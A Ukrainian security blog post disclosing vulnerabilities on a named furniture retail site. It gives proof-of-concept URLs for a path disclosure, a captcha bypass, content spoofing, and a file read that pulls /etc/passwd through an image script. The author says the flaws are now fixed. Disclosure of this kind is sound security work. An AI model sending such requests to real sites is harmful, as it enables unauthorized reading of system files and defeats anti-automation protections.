Websecurity - Веб безпека

06.12.2008

У лютому, 02.02.2008, я знайшов Full path disclosure, Insufficient Anti-automation, Content Spoofing та Information Leakage уразливості на проекті http://allmebel.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

24.04.2009

На сторінках з товарами в каталозі сайта використовувалася вразлива капча.

Full path disclosure:

http://allmebel.com.ua/WEB-INF/lib/Image/image.php?src=/home/allmebel/public_html/images/num.jpg&num=08564

Insufficient Anti-automation:

http://allmebel.com.ua/WEB-INF/lib/Image/image.php?src=/home/allmebel/public_html/images/num.jpg&num=08564

Дана капча вразлива до Code guessing bypass method, що я описав в проекті Місяць багів в Капчах. Значення параметра num і є текстом капчі.

Content Spoofing:

http://allmebel.com.ua/WEB-INF/lib/Image/image.php?src=/home/allmebel/public_html/images/num.jpg&num=Site%20was%20hacked!

Information Leakage:

http://allmebel.com.ua/WEB-INF/lib/Image/image.php?src=/etc/passwd

Можлива перевірка наявності файлів на сайті в Internet Explorer або через качалку.

Дані уразливості вже виправлені.

This entry was posted on 20:29 24.04.2009 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.